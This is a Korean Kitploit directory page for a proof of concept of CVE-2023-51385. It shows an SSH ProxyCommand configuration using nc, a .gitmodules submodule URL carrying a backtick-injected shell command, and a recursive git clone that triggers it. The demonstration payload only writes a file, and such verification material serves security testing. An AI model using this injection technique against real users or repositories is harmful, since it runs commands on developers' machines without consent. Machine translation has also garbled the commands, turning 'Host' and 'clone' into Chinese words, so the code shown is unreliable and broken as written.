Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-51385_test — CVE-2023-51385에 대한 검증 | Kitploit
도구/GitHubGitHub/power1314520/cve-2023-51385_test
Vulnerability AnalysisExploitationWeb Application ExploitationPapers & ResearchLearning & Education
GitHubpower1314520/cve-2023-51385_test

CVE-2023-51385_test

CVE-2023-51385에 대한 검증

저장소 보기
2년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

##CVE-2023-51385 검증

###먼저 ~/.ssh/config에 다음과 같이 추가해야 합니다

root@kitploit:~
主机 *.example.com
  ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p

.gitmodules파일 구문에는 명령 주입이 존재합니다

root@kitploit:~
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar

구성 완료 후 아래 명령을 실행하여 트리거합니다

root@kitploit:~
git 克隆 https://github.com/zls1793/CVE-2023-51385_test --recurse-submodules

성공적으로 실행되면 CVE-2023-51385_test 디렉터리에 cve.txt 파일이 생성됩니다

![ image-20231225234031349 ] ( https://ltmthink-blogimages.oss-cn-hangzhou.aliyuncs.com/imgs/202312252345762.png )

자세한 내용은 논문 블로그를 참조하세요:

https://vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html

도구 다운로드